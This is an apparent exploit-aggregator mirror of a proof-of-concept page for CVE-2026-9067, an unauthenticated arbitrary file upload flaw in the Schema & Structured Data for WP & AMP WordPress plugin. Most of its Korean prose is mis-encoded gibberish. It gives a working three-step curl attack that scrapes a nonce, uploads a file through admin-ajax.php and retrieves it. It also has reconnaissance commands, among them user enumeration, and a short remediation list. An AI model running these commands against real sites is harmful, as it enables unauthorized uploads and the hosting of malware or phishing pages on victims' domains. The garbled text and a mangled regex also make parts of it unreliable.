## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-POLOSSS-BY-POLOSS..-..CVE-2026-9067
# POC & Xploit - κ°λ
μ¦λͺ
λλ ν 리
WordPress 보μ ν
μ€νΈ νκ²½μμ λ°κ²¬λ μ·¨μ½μ μ λν λ¬Έμ λ° μ΅μ€νλ‘μ
* * *
## μ·¨μ½μ λͺ©λ‘
CVE ID| νλ¬κ·ΈμΈ| μ¬κ°λ| μ ν| μν
---|---|---|---|---
CVE-2026-9067| Schema & Structured Data for WP & AMP| λμ (8.1)| 무μ ν νμΌ μ
λ‘λ| λ¬Έμνλ¨
* * *
## CVE-2026-9067
### λΉ λ₯Έ μμ½
### μ·¨μ½μ μ€λͺ
Schema & Structured Data for WP & AMP νλ¬κ·ΈμΈ λ²μ 1.60 λ―Έλ§μ νμΌ μ
λ‘λλ₯Ό μν AJAX νΈλ€λ¬μμ μ¬μ©μ κΆνμ κ²μ¦νμ§ μκ³ μ
λ‘λλ νμΌ νμμ κ²μ¦νμ§ μμ΅λλ€. μ΄λ‘ μΈν΄ μΈμ¦λμ§ μμ 곡격μκ° μμ νμΌμ μ
λ‘λν μ μμ΅λλ€.
### μν₯
* **μ½ν
μΈ νΈμ€ν
** : 곡격μκ° νΌν΄μ λλ©μΈμ μ
μ± μ½ν
μΈ λ₯Ό νΈμ€ν
ν μ μμ
* **λμ€ν¬ μλΉ** : μμ νμΌ μ
λ‘λλ‘ λμ€ν¬ 곡κ°μ μμ§ν μ μμ
* **νν μ
μ©** : νΌν΄μ λλ©μΈμμμ 맬μ¨μ΄, νΌμ± νμ΄μ§ λ°°ν¬
**μ€μ μ°Έκ³ μ¬ν** : WordPress μ½μ΄λ μ€ν νμΌ(`.php`, `.phtml`, `.html`, `.svg`)μ μ°¨λ¨νλ―λ‘, μ΄ μ·¨μ½μ μΌλ‘ μΈν **μ§μ μ μΈ RCE κ²½λ‘λ μμ΅λλ€**.
### Files
root@kitploit:~
CVE-2026-9067/
βββ CVE-2026-9067.md # Dokumentasi lengkap (file ini)
βββ CVE-2026-9067.py # Python exploit dengan multi-threading
βββ CVE-2026-9067.sh # Bash/Shell PoC script
βββ CVE-2026-9067_exploit.sh # Alternative Bash PoC
### λΉ λ₯Έ PoC
root@kitploit:~
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/HEAD/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)
# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
-F 'action=saswp_rf_form_image_upload' \
-F "saswp_rf_form_nonce=$NONCE" \
-F 'some-email@example.com;type=image/png;filename=evil.csv'
# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"
* * *
## νκ²½ μ 보
* * *
## ν
μ€νΈ λͺ
λ Ήμ΄
### μ¬μ΄νΈ μν νμΈ
root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site
### νλ¬κ·ΈμΈ λ²μ νμΈ
root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"
### μ¬μ©μ μ΄κ±°
root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'
* * *
## ν΄κ²° λ°©λ²
1. **νλ¬κ·ΈμΈ μ
κ·Έλ μ΄λ** : Schema & Structured Data for WP & AMPλ₯Ό λ²μ 1.60 μ΄μμΌλ‘ μ
λ°μ΄νΈ
2. **νλ¬κ·ΈμΈ λΉνμ±ν** : μ
κ·Έλ μ΄λκ° λΆκ°λ₯νλ©΄ νλ¬κ·ΈμΈ λΉνμ±ν
3. **κ°ν** :
* `DISALLOW_FILE_MODIFICATIONS` μμ μ€μ
* `.htaccess`λ₯Ό ν΅ν΄ μ
λ‘λ λλ ν 리μμ PHP μ€ν λΉνμ±ν
* WAF κ·μΉ ꡬν
* * *
## μ°Έκ³ μλ£
* NVD CVE-2026-9067
* WPScan Vulnerability Database
* WordPress νλ¬κ·ΈμΈ νμ΄μ§
* μλ³Έ μ°κ΅¬μ: 0xBassia